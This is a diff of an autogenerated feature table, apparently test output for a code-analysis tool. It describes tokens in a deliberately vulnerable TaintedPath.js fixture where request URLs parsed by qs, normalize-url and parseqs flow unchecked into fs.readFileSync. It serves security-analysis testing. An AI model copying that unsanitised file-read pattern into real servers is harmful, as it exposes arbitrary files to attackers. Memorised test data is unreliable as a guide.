+| autogenerated/TaintedPath/TaintedPath.js:204:38:204:49 | normalizeUrl | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:204:38:204:58 | exceptional return of normali ... eq.url) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:38:204:58 | exceptional return of normali ... eq.url) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:204:38:204:58 | exceptional return of normali ... eq.url) | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:204:38:204:58 | exceptional return of normali ... eq.url) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:204:38:204:58 | exceptional return of normali ... eq.url) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:204:38:204:58 | normali ... eq.url) | CalleeFlexibleAccessPath | qs.parse | | autogenerated/TaintedPath/TaintedPath.js:204:38:204:58 | normali ... eq.url) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:204:38:204:58 | normali ... eq.url) | calleeImports | qs | @@ -6781,6 +66321,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:204:38:204:58 | normali ... eq.url) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:204:38:204:58 | normali ... eq.url) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:204:38:204:58 | normali ... eq.url) | receiverName | qs | +| autogenerated/TaintedPath/TaintedPath.js:204:51:204:53 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:51:204:53 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:51:204:53 | req | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:204:51:204:53 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:204:51:204:53 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:204:51:204:57 | req.url | CalleeFlexibleAccessPath | normalizeUrl | | autogenerated/TaintedPath/TaintedPath.js:204:51:204:57 | req.url | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:204:51:204:57 | req.url | calleeImports | normalize-url | @@ -6789,6 +66334,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:204:51:204:57 | req.url | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | | autogenerated/TaintedPath/TaintedPath.js:204:51:204:57 | req.url | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:204:51:204:57 | req.url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:204:55:204:57 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:55:204:57 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:55:204:57 | url | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:204:55:204:57 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:204:55:204:57 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:204:61:204:63 | foo | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:61:204:63 | foo | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:61:204:63 | foo | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:204:61:204:63 | foo | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:204:61:204:63 | foo | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:205:9:205:15 | parseqs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:205:9:205:15 | parseqs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:205:9:205:15 | parseqs | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:205:9:205:15 | parseqs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:205:9:205:15 | parseqs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:205:9:205:36 | parseqs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:205:9:205:36 | parseqs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:205:9:205:36 | parseqs | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:205:9:205:36 | parseqs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:205:9:205:36 | parseqs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:205:9:205:36 | parseqs ... rseqs") | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:205:9:205:36 | parseqs ... rseqs") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:205:9:205:36 | parseqs ... rseqs") | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:205:9:205:36 | parseqs ... rseqs") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:205:9:205:36 | parseqs ... rseqs") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:205:19:205:25 | require | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:205:19:205:25 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:205:19:205:25 | require | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:205:19:205:25 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:205:19:205:25 | require | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:205:19:205:36 | exceptional return of require("parseqs") | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:205:19:205:36 | exceptional return of require("parseqs") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:205:19:205:36 | exceptional return of require("parseqs") | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:205:19:205:36 | exceptional return of require("parseqs") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:205:19:205:36 | exceptional return of require("parseqs") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:205:19:205:36 | require("parseqs") | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:205:19:205:36 | require("parseqs") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:205:19:205:36 | require("parseqs") | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:205:19:205:36 | require("parseqs") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:205:19:205:36 | require("parseqs") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:205:27:205:35 | "parseqs" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/TaintedPath.js:205:27:205:35 | "parseqs" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:205:27:205:35 | "parseqs" | calleeImports | | @@ -6797,6 +66382,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:205:27:205:35 | "parseqs" | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | | autogenerated/TaintedPath/TaintedPath.js:205:27:205:35 | "parseqs" | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:205:27:205:35 | "parseqs" | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:206:3:206:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:206:3:206:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:206:3:206:5 | res | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:206:3:206:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:206:3:206:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:206:3:206:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:206:3:206:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:206:3:206:11 | res.write | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:206:3:206:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:206:3:206:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:206:3:206:57 | exceptional return of res.wri ... ).foo)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:206:3:206:57 | exceptional return of res.wri ... ).foo)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:206:3:206:57 | exceptional return of res.wri ... ).foo)) | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:206:3:206:57 | exceptional return of res.wri ... ).foo)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:206:3:206:57 | exceptional return of res.wri ... ).foo)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:206:3:206:57 | res.wri ... ).foo)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:206:3:206:57 | res.wri ... ).foo)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:206:3:206:57 | res.wri ... ).foo)) | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:206:3:206:57 | res.wri ... ).foo)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:206:3:206:57 | res.wri ... ).foo)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:206:7:206:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:206:7:206:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:206:7:206:11 | write | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:206:7:206:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:206:7:206:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:206:13:206:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:206:13:206:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:206:13:206:14 | fs | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:206:13:206:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:206:13:206:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:206:13:206:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:206:13:206:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:206:13:206:27 | fs.readFileSync | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:206:13:206:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:206:13:206:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:206:13:206:56 | exceptional return of fs.read ... l).foo) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:206:13:206:56 | exceptional return of fs.read ... l).foo) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:206:13:206:56 | exceptional return of fs.read ... l).foo) | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:206:13:206:56 | exceptional return of fs.read ... l).foo) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:206:13:206:56 | exceptional return of fs.read ... l).foo) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:206:13:206:56 | fs.read ... l).foo) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:206:13:206:56 | fs.read ... l).foo) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:206:13:206:56 | fs.read ... l).foo) | contextFunctionInterfaces | views_local(req, res) | @@ -6805,6 +66430,31 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:206:13:206:56 | fs.read ... l).foo) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:206:13:206:56 | fs.read ... l).foo) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:206:13:206:56 | fs.read ... l).foo) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:206:16:206:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:206:16:206:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:206:16:206:27 | readFileSync | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:206:16:206:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:206:16:206:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:206:29:206:35 | parseqs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:206:29:206:35 | parseqs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:206:29:206:35 | parseqs | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:206:29:206:35 | parseqs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:206:29:206:35 | parseqs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:206:29:206:42 | parseqs.decode | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:206:29:206:42 | parseqs.decode | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:206:29:206:42 | parseqs.decode | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:206:29:206:42 | parseqs.decode | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:206:29:206:42 | parseqs.decode | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:206:29:206:51 | exceptional return of parseqs ... eq.url) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:206:29:206:51 | exceptional return of parseqs ... eq.url) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:206:29:206:51 | exceptional return of parseqs ... eq.url) | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:206:29:206:51 | exceptional return of parseqs ... eq.url) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:206:29:206:51 | exceptional return of parseqs ... eq.url) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:206:29:206:51 | parseqs ... eq.url) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:206:29:206:51 | parseqs ... eq.url) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:206:29:206:51 | parseqs ... eq.url) | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:206:29:206:51 | parseqs ... eq.url) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:206:29:206:51 | parseqs ... eq.url) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:206:29:206:55 | parseqs ... rl).foo | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:206:29:206:55 | parseqs ... rl).foo | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:206:29:206:55 | parseqs ... rl).foo | calleeImports | fs | @@ -6814,6 +66464,16 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:206:29:206:55 | parseqs ... rl).foo | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:206:29:206:55 | parseqs ... rl).foo | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:206:29:206:55 | parseqs ... rl).foo | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:206:37:206:42 | decode | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:206:37:206:42 | decode | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:206:37:206:42 | decode | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:206:37:206:42 | decode | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:206:37:206:42 | decode | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:206:44:206:46 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:206:44:206:46 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:206:44:206:46 | req | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:206:44:206:46 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:206:44:206:46 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:206:44:206:50 | req.url | CalleeFlexibleAccessPath | parseqs.decode | | autogenerated/TaintedPath/TaintedPath.js:206:44:206:50 | req.url | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:206:44:206:50 | req.url | calleeImports | parseqs | @@ -6823,12 +66483,87 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:206:44:206:50 | req.url | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:206:44:206:50 | req.url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:206:44:206:50 | req.url | receiverName | parseqs | +| autogenerated/TaintedPath/TaintedPath.js:206:48:206:50 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:206:48:206:50 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:206:48:206:50 | url | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:206:48:206:50 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:206:48:206:50 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:206:53:206:55 | foo | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:206:53:206:55 | foo | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:206:53:206:55 | foo | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:206:53:206:55 | foo | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:206:53:206:55 | foo | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:209:7:209:8 | cp | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:209:7:209:8 | cp | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:209:7:209:8 | cp | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:209:7:209:8 | cp | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:209:7:209:35 | cp | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:209:7:209:35 | cp | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:209:7:209:35 | cp | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:209:7:209:35 | cp = re ... ocess") | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:209:7:209:35 | cp = re ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:209:7:209:35 | cp = re ... ocess") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:209:12:209:18 | require | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:209:12:209:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:209:12:209:18 | require | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:209:12:209:35 | exceptional return of require ... ocess") | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:209:12:209:35 | exceptional return of require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:209:12:209:35 | exceptional return of require ... ocess") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:209:12:209:35 | require ... ocess") | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:209:12:209:35 | require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:209:12:209:35 | require ... ocess") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:209:20:209:34 | "child_process" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/TaintedPath.js:209:20:209:34 | "child_process" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:209:20:209:34 | "child_process" | calleeImports | | | autogenerated/TaintedPath/TaintedPath.js:209:20:209:34 | "child_process" | contextFunctionInterfaces | views_local(req, res) | | autogenerated/TaintedPath/TaintedPath.js:209:20:209:34 | "child_process" | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/TaintedPath.js:209:20:209:34 | "child_process" | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | 